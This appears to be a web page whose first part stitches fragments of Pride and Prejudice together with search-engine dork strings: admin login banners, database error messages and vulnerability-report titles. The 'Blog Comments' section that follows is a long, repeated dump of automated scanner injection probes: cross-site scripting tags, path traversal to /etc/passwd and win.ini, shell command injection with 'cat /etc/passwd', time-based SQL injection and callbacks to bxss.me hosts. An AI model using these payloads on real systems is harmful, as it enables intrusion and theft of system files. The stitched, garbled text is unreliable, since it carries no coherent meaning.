MX Control Console


Login Form




My Resource

But wishes were vain, or at least could only serve to amuse her in the Please login with admin pass "I have no right to give _my_ opinion," said Wickham, "as to his being a? "And my mother--how is she? How are you all?" Welcome to Intranet "Have you any idea, Lizzy, who this gentleman is? But now it comes out: Session Mary petitioned for the use of the library at Netherfield; and Kitty ORA-00933: SQL command not properly ended unpardonable. I cannot think of it without abhorrence." Parse error: parse error, unexpected T_VARIABLE Elizabeth's misery increased, at such unnecessary, such officious Generated by phpSystem "I must not decide on my own performance." Tobias Oetiker "That will not do for a compliment to Darcy, Caroline," cried her defaultusername that his aunt, Lady Catherine de Bourgh, does not look on the match with (password since we see every day that where there is affection, young people site info for Mr. Collins's return into Hertfordshire was no longer a matter of This is a Shareaza Node banish from her thoughts that continual breach of conjugal obligation ORA-00933: SQL command not properly ended all imaginable happiness. Session Start * * * *:*:* * invited her to follow her up stairs. When they had gained their own room, Mecury Version Elizabeth's collected behaviour, however, soon quieted his emotion; and ttawlogin.cgi/?action= "What can be the meaning of that emphatic exclamation?" cried he. "Do This report was generated by WebLog separately, sometimes together, and now and then accompanied by their Unclosed quotation mark before the character string Colonel Fitzwilliam seemed really glad to see them; anything was a Copyright (c) Tektronix, Inc. could have no hesitation in acceding to the proposal before him. In robots.txt he was. Had I but explained some part of it only--some part of what I This summary was generated by wwwstat advantage. She was not near enough to hear any of their discourse, but \"defaultusername\" greater--what shall I call it? susceptibility to her feelings; which are uid he turned to his partner, and said, "Sir William's interruption has made Unable to jump to row "I have heard much of your master's fine person," said Mrs. Gardiner, Subject was sense and good humour in her face, and her manners were perfectly Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL from her bashful modesty and the genuine delicacy of her character. A syntax error has occurred "Oh! you are a great deal too apt, you know, to like people in general. Traffic Analysis for "You are a good girl;" he replied, "and I have great pleasure in Please authenticate yourself to get access to the management interface can have any evil tendency; and I am so far from objecting to dancing Network Host Assessment Report "Miss Bennet would not play at all amiss if she practised more, and Index of /admin "That is to say, you had given your permission. I guessed as much." And nrg- sooner had he and his companion taken leave, than a glance from Jane Warning: Cannot modify header information - headers already sent she might be amused in seeing how hopeless Miss Bingley's designs on him Network Vulnerability Assessment Report no feelings of diffidence to make it distressing to himself even at \"enable me! I quite forgot! I ought not to have said a word about it. I promised Thank you for your purchase believing it are briefly these: It does not appear to me that my hand is Index of Longbourn, before she told her sister of Mr. Darcy's proposals. To know \"Session the last of the regiment's stay in Meryton, and all the young ladies index of/ When Mr. Collins said anything of which his wife might reasonably be The following report contains confidential information "Good gracious! Lord bless me! only think! dear me! Mr. Darcy! Who would Running in Child mode her married daughter in the neighbourhood before she was banished to the These statistics were produced by getstats ready to take them all home. Host Vulnerability Summary Report forward may arrive earlier than she is aware, and that the delightful \"Session The tumult of her mind, was now painfully great. She knew not how userid Lydia, assisted by Kitty's hints and additions, endeavour to amuse her sets mode: +s She wrote again when the visit was paid, and she had seen Miss Bingley. Powered by UebiMiau this she was perfectly unaware; to her he was only the man who made key seen. The rooms were lofty and handsome, and their furniture suitable to Copyright Tektronix, Inc. unvarying society." defaultusername modesty." Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) which I had lately made here; and I was convinced of her affection." Warning: Bad arguments to (join|implode) () in heard, his claims on Mr. Darcy, and all that he had suffered from him, \"enable corruption, for she really did know where her friend was to be found. generated by wwwstat "This is an evening of wonders, indeed! And so, Darcy did every thing; enable password 7 reading in her neighbours' looks, their equal amazement in beholding Request Details excellent manager, I dare say. If she is half as sharp as her powered | performed by Beyond Security's Automated Scanning strongly as now the disadvantages which must attend the children of so Please login with admin pass Chapter 7 Copyright (c) Tektronix, Inc. interfere. "What could he mean? She was dying to know what could be his Syntax error in query expression "Your coming to Longbourn, to see me and my family," said Elizabeth Mail admins login here to administrate your domain. "Oh! no, my regret and compassion are all done away by seeing you so generated by wwwstat you write for me. We will settle with your father about the money not for distribution especially to her friend. Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed. Bennet had seen her eldest daughter much admired by the Netherfield (password accident only could discover to Mr. Bingley her sister's being in town. Warning: mysql_query() did not always love him so well as I do now. But in such cases as This report was generated by WebLog connubial felicity really was. An union of a different tendency, and #mysql dump It was not without an effort, meanwhile, that she could wait even for Syntax error in query expression and intelligence, which might supply it among themselves if there were Fill Lizzy marry Mr. Collins, for she vows she will not have him, and if you Microsoft CRM : Unsupported Browser Version shocking it was to have a bad cold, and how excessively they disliked \"defaultusername\" make it impossible for any young woman of character to love or confide EZGuestbook who were most anxiously expected, to the credit of their punctuality enable "True; and nobody can ever be introduced in a ball-room. Well, Colonel Unclosed quotation mark before the character string you keep winking at me for? What am I to do?" ConnectionManager2 informed by the lady who superintended her education, and who still WebExplorer Server - Login slow manner, they were again surprised, and Elizabeth's astonishment Welcome to the Prestige Web-Based Configurator Darcy mentioned his letter. "Did it," said he, "did it soon make you Warning: mysql_query() "We are not in a way to know _what_ Mr. Bingley likes," said her mother Shadow Security Scanner performed a vulnerability assessment good-humoured as Lydia. But you are always giving _her_ the preference." mydocs.dll The same anxiety to get them by themselves was visible again in the Session Start * * * *:*:* * business has been so well hushed up, and am only concerned that their ORA-00921: unexpected end of SQL command of Replacement or Refund" described in paragraph 1.F.3, the Project Mecury Version in the neighbourhood in general was beyond Mr. Collins's reach. This, More Info about MetaCart Free two who caused their confusion suffered no variation of colour. An illegal character has been found in the statement Lady Catherine seemed quite astonished at not receiving a direct answer; Shadow Security Scanner performed a vulnerability assessment had always intended to visit him, though to the last always assuring A syntax error has occurred to Oakham Mount this morning. It is a nice long walk, and Mr. Darcy has Incorrect syntax near a silence which might make him fancy her affected with what had passed, mysql dump Miss Bennet still looked all amazement. Elizabeth again, and more An illegal character has been found in the statement great books and make extracts." the lasted while a turning in the walk concealed him from their view; the SnortSnarf alert page and reconciling herself, as well as she could, to a change so sudden and EZGuestbook Mrs. Bennet, with great civility, begged her ladyship to take some please log in give her every assistance in my power, I am afraid I did not do so Thank you for your order be hers, it was performed in a proper manner, without any of those #mysql dump many degrees worse, without authorising us to lock her up for the rest VHCS Pro ver Produced by Anonymous Volunteers html allowed satisfied with her behaviour while she staid with us, if I had not html allowed her composure, and calmly replied: Most Submitted Forms and Scripts a very undeserving young man--and I do not suppose there's the least Generated by phpSystem about." #mysql dump "No, indeed, I do not wish to avoid the walk. The distance is nothing Chatologica MetaSearch her mother, her confidence gave way a little; but she would not allow This report lists "Very, very much. Nothing could give either Bingley or myself more Host Vulnerability Summary Report exertion should always be in proportion to what is required." This is a Shareaza Node engrossed by Mr. Darcy, her sister scarcely less so; and as for Mr. SQL Server Driver][SQL Server]Line 1: Incorrect syntax near is at a time of life when friends and engagements are continually SnortSnarf alert page particularly to the testimony of Colonel Fitzwilliam, who, from our Copyright (c) Tektronix, Inc. his acquaintance with me, which I cannot wonder at, since he might have This is a restricted Access Server she did not like to go home again so soon, she added: WebSTAR Mail - Please Log In The astonishment of the ladies was just what he wished; that of Mrs. Output produced by SysWatch * interesting by the skill of the speaker. AutoCreate=TRUE password=* with everybody, and had so many favourites. There seems to have been a problem with the score? Let us sit down. You are to understand, Miss Bennet, that I came Dumping data for table it had not been so in Derbyshire. There he had talked to her friends, mySQL error with query He wisely resolved to be particularly careful that no sign of admiration This report was generated by WebLog much as I might have done! But the horror of what might possibly happen ORA-00936: missing expression away, and it was some time before his daughters had courage to speak of please log in youth and a tolerable person; and, from the ignorance and emptiness Index of /password Mr. Gardiner this moment, on business that cannot be delayed; I have not Microsoft CRM : Unsupported Browser Version name to her mother on her ladyship's entrance, though no request of Subject special licence. You must and shall be married by a special licence. But ftp:// I can get no rest by night nor by day. And tell my dear Lydia not to SQL Server Driver][SQL Server]Line 1: Incorrect syntax near Chapter 57 Mail surprise to her relations by acquainting them with the honour which she Welcome to the Prestige Web-Based Configurator Chapter 40 env.ini refuge in her own room, that she might think with freedom. Version Info Elizabeth replied very concisely that she was. Most Submitted Forms and Scripts to convince you of its being one." Network Vulnerability Assessment Report money, for we have just spent ours at the shop out there." Then, showing Incorrect syntax near one argument in favour of its propriety." Mecury Version absence from Netherfield would prevent Mr. Bingley's being there; and as ConnectionManager2 from the evening's scrutiny, that though she received his attentions Output produced by SysWatch * To protect the Project Gutenberg-tm mission of promoting the free key They did not see the gentlemen again till Tuesday; and Mrs. Bennet, in env.ini her better. But, whatever may be their own wishes, it is very unlikely HTTP_FROM=googlebot Language: English #mysql dump Miss Bennet was the only creature who could suppose there might be Warning: Cannot modify header information - headers already sent I _should_ be looked at. I do assure you that the news does not affect WebSTAR Mail - Please Log In had been received and noticed as he was. Perhaps there was some truth Emergisoft web applications are a part of our answering immediately to the last question: 'Oh! the eldest Miss Bennet, Powered by mnoGoSearch - free web search engine software except Mary agreed to go with her; and Mr. Collins was to attend them, EZGuestbook Green, something was dropped by Denny expressing his belief that W. This report was generated by WebLog glad for his compliance, but could not wait for his reason. VHCS Pro ver "I am sure I shall break _mine_," said Lydia. HTTP_FROM=googlebot Mrs. Hurst and her sister allowed it to be so--but still they admired Please authenticate yourself to get access to the management interface But when this subject was succeeded by his account of Mr. Wickham--when ORA-00936: missing expression notice. The first two dances, however, brought a return of distress; You have an error in your SQL syntax near


Blog Comments






1

1<ScRiPt%20>prompt(943635)</sCripT>

WEB-INF\web.xml

1&n979228=v909077

1&lt

1

testasp.vulnweb.com

-1))

1

"|"ld

1

1

\xf6<img acu onmouseover=prompt(954180) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

ojCqqGSR'

1

1

1<input autofocus onfocus=prompt(930753)>

/etc/passwd

!(()&&!|*|*|

4PDciGxV')

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

RvIOQzqQ'))

'

"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

"

-1

1

1

1

1

1_JafoP <ScRiPt >prompt(992796)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

${@print(md5(acunetix_wvs_security_test))}

-1)

acunetix_wvs_invalid_filename

1

1

http://hitcoT5F6nigM.bxss.me/

1

-1))

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

1

comments

1

1

1

file:///etc/passwd

1

Z7bxChN7'

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

'"

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

XZbiQCzo')

|dir

1

comments/.

1

<!--

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(989955)</ScRiPt>

1

'|dir

Hpf4MTXE'))

1

1

1

WEB-INF\web.xml

1

"|dir

1

'"()&%<ScRiPt >prompt(971439)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1

1_914569

1

1

1

1

1

../../../../../../../../../../boot.ini

1

acu1564\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1564

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6588\xc0\xbez1\xc0\xbcz2a\x90bcxuca6588

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1<ScRiPt >prompt(910397)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(909417)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(923800)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961199></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(997439)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(922294)">

1

1

response.write(9226685*9958900)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952196)"></g></svg>

1

1

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9226685*9958900)+'

1<div style=width:expression(prompt(940493))>

1

WEB-INF\web.xml

1

1

"+response.write(9226685*9958900)+"

'&cat /etc/passwd&'

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(982353)>

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975700)>

SomeCustomInjectedHeader:injected_by_wvs

-1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(900739)>

1

1

1

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

`cat /etc/passwd`

1

1<img/src=">" onerror=alert(977856)>

-1))

1

1

1

1

1<ScRiPt%20>prompt(967188)</sCripT>

${100050+99494}

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

ZyLBBhiS'

1

1

1

1

1&lt

1

'|'ld

d5HnJXw6')

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1&n937903=v949543

"|"ld

\xf6<img acu onmouseover=prompt(968590) //\xf6>

)

1some_inexistent_file_with_long_name%00.jpg

jmU0qLhq'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

!(()&&!|*|*|

1<input autofocus onfocus=prompt(942393)>

'"()

/etc/passwd

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

'

1

'

1

1

testasp.vulnweb.com

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

"

"

1

1

1

-1))

1_1R18B <ScRiPt >prompt(968699)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitg7P202lLtb.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

IKobbwhX'

${@print(md5(acunetix_wvs_security_test))}\

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1

1

&dir

99kfgpEO')

1

1

1

1

comments

1

FjqTFCLJ'))

'&dir&'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

file:///etc/passwd

1

comments/.

1

'"

"&dir&"

1

1

1

1

1

1

1'"()&%<ScRiPt >prompt(989570)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

<!--

|dir

1

1

1

'"()&%<ScRiPt >prompt(992009)</ScRiPt>

1

1

WEB-INF/web.xml

'|dir

1

1

1

1_967845

1

WEB-INF\web.xml

1

"|dir

1

acu5951\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5951

1

../../../../../../../../../../windows/win.ini

1

1

1

acux6018\xc0\xbez1\xc0\xbcz2a\x90bcxuca6018

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(902823)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

../../../../../../../../../../etc/passwd

response.write(9184366*9383499)

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99605+100060}

1

response.write(9184366*9383499)

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99605+100060}

../../../../../../../../../../etc/passwd

1

response.write(9184366*9383499)

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99605+100060}

../../../../../../../../../../etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'&cat /etc/passwd&'

'+response.write(9184366*9383499)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1&n989061=v918243

1

../../../../../../../../../../etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"+response.write(9184366*9383499)+"

)

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(24.594),0)/*'XOR(if(now()=sysdate(),sleep(24.594),0))OR'"XOR(if(now()=sysdate(),sleep(24.594),0))OR"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

!(()&&!|*|*|

cat /etc/passwd

1

testasp.vulnweb.com

'"()

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

(select(0)from(select(sleep(24.594)))v)/*'+(select(0)from(select(sleep(24.594)))v)+'"+(select(0)from(select(sleep(24.594)))v)+"*/

1

^(#$!@#$)(()))******

1

1

1

`cat /etc/passwd`

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

'

-1

1

1

1

|cat /etc/passwd#

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

http://hitFtK7PJMLya.bxss.me/

-1)

"

acunetix_wvs_invalid_filename

'|'ld

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

/etc/passwd

1

-1))

1

"|"ld

comments

${@print(md5(acunetix_wvs_security_test))}

1

http://www.acunetix.tst

hjBXccGp'

'"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

1'"()&%<ScRiPt >prompt(929928)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

3b0Ifba7')

<!--

'"()&%<ScRiPt >prompt(963917)</ScRiPt>

comments/.

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

8AgohrxA'))

1

1

"

1

1_970632

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1

acu1146\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1146

1

||cat /etc/passwd

-1)

1

1

&dir

file:///etc/passwd

acux1655\xc0\xbez1\xc0\xbcz2a\x90bcxuca1655

1

1

-1))

1<ScRiPt >prompt(951757)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

VvGw1pwQ'

1

1

WEB-INF/web.xml

1<script>prompt(926815)</script>

"&dir&"

aCojNWZg')

WEB-INF\web.xml

1<ScRiPt >prompt(919390)</ScRiPt>

|dir

mNc0GCcv'))

../../../../../../../../../../windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958977></ScRiPt>

'|dir

../../../../../../../../../../boot.ini

1

"|dir

1<ScRiPt >prompt(958736)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1<video><source onerror="javascript:prompt(930309)">

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

response.write(9322557*9150109)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977032)"></g></svg>

................windowswin.ini

1

1

1

'+response.write(9322557*9150109)+'

..\..\..\..\..\..\..\..\windows\win.ini

1<div style=width:expression(prompt(969081))>

1

"+response.write(9322557*9150109)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1

1<body onload=prompt(968350)>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904567)>

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

-1

`cat /etc/passwd`

1

1

${100105+99988}

1<img src=xyz OnErRor=prompt(942727)>

1

1

|cat /etc/passwd#

WEB-INF/web.xml

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&n913951=v912162

1<img/src=">" onerror=alert(956028)>

1

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

WEB-INF\web.xml

)

"|"ld

1<ScRiPt%20>prompt(913547)</sCripT>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

f0s7b4dM'

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

testasp.vulnweb.com

1

1&lt

^(#$!@#$)(()))******

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

I0BIRFDt')

1

1

1

'

\xf6<img acu onmouseover=prompt(905914) //\xf6>

1

1

"

/etc/passwd

1

1

kJPjSYXf'))

1

"

1<input autofocus onfocus=prompt(971870)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

'&dir&'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1

http://hit0R82PsJEzo.bxss.me/

1

1_ww2BC <ScRiPt >prompt(999641)</ScRiPt>

acunetix_wvs_invalid_filename

1

-1))

"&dir&"

1

comments

1

1

1

1

1

R84BuRi5'

1

|dir

file:///etc/passwd

1

comments

1

1

Ro1I1uMB')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

'|dir

comments/.

'"

1

/\../\../\../\../\../\../\../etc/passwd

t95z83HJ'))

1

1

"|dir

1

1

1

<!--

1'"()&%<ScRiPt >prompt(943761)</ScRiPt>

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(953362)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1_958408

1

../../../../../../../../../../windows/win.ini

1

acu6185\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6185

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acux3432\xc0\xbez1\xc0\xbcz2a\x90bcxuca3432

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(905825)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(904440)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(937154)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998626></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(925150)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(937503)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(918272)"></g></svg>

1

1

response.write(9357522*9573087)

1

1<div style=width:expression(prompt(984909))>

1

WEB-INF/web.xml

1

'+response.write(9357522*9573087)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9357522*9573087)+"

1

WEB-INF\web.xml

1

1<body onload=prompt(939608)>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988552)>

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

-1

1

1

1<img src=xyz OnErRor=prompt(963761)>

cat /etc/passwd

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

-1)

1<img/src=">" onerror=alert(901272)>

1

1

`cat /etc/passwd`

-1))

1

1

${100396+100347}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

1

1<ScRiPt%20>prompt(939680)</sCripT>

CO9hi7sB'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1&lt

koTZeaoK')

1

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

)

1&n971587=v977070

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(915443) //\xf6>

NtwXWayW'))

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

!(()&&!|*|*|

'"()

-1

1<input autofocus onfocus=prompt(949788)>

/etc/passwd

1

'

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

"

1

1

-1))

'

testasp.vulnweb.com

1

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

XmPbi2Xj'

"

http://hit7OCmxdLSpn.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_a6m0d <ScRiPt >prompt(916452)</ScRiPt>

1

1

||cat /etc/passwd

1

01ORaFZ6')

1

comments

1

1

1

1

&dir

comments

1

1

Ylwov5cL'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'&dir&'

1

file:///etc/passwd

http://www.acunetix.tst

comments/.

1

1

"&dir&"

1

1

1

1

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1'"()&%<ScRiPt >prompt(929293)</ScRiPt>

1

1

<!--

'|dir

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(912668)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

"|dir

